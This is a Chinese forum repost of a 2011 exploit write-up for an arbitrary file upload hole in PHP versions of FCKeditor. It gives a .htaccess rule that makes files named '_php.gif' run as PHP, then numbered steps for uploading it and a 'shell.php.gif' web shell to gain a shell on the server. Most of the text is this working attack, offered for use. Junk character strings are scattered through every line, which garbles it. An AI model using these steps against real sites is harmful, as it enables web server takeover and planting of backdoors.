FCKeditor所有php版本Upload上传漏洞2 |2 a5 U& |6 |; E6 M' {
作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:07& G, J2 c1 Y! S3 T2 ` G- D" A7 ]
减小字体 增大字体
9 f- S5 r* O/ P; p[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability
6 x" ]- U( b2 c[+] Date: 2011
, B. j" b) d) I[+] Author : sinesafe.cn
8 b7 n: Q$ [' @/ L- m8 m8 T[+] Website : WwW.sinesafe.cn
9 t& b: \$ ~& Z( D) e; c& F f———————————————————3 C: k4 ?6 V( T
1.create a htaccess file:9 p5 u# X$ B. y9 |
code:0 l% e+ U+ q v6 x' L8 Z2 u1 _; Z
<FilesMatch “_php.gif”>6 A& U; [' A4 ^/ P
SetHandler application/x-httpd-php
, [& Y) ?/ R. N& g" E7 S6 V3 C* x</FilesMatch>
- p- C# A9 m8 R! ? Y5 _& r% P& E4 Z6 ]! n6 g3 j, s9 Z
2.Now upload this htaccess with FCKeditor.9 E6 @6 e$ W, V5 [9 y
! y4 T+ B: E X5 E4 thttp://www.sinesafe.cn/FCKeditor ... er/upload/test.html
) b% |7 G( ?6 l9 E6 R' n; c$ Z1 S+ j7 Q1 c
http://www.sinesafe.cn/FCKeditor ... onnectors/test.html
' @, C Q# X, U+ }8 _7 \
9 r9 e: i9 d$ n( v$ _- Q/ f———————————————————————————————-3 Z+ \3 }# {( M/ W" v! [
3.Now upload shell.php.gif with FCKeditor.: u+ y! X% u" q& ]% p- ^& R, f
4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically.0 B3 H" b# k8 ?( B4 S
5.http://www.sinesafe.cn/anything/shell_php.gif
, D2 u8 R" T4 `) h% y6.Now shell is available from server. |
1 J( h. ?. P& D* k+ O7 i8 D
& F4 u! f: ^ T9 Y' T& @3 k! \+ i2 \
1 f/ R: k$ v) s" T Q" I; s |
发表于 2013-10-27 17:25:21
收藏
支持
反对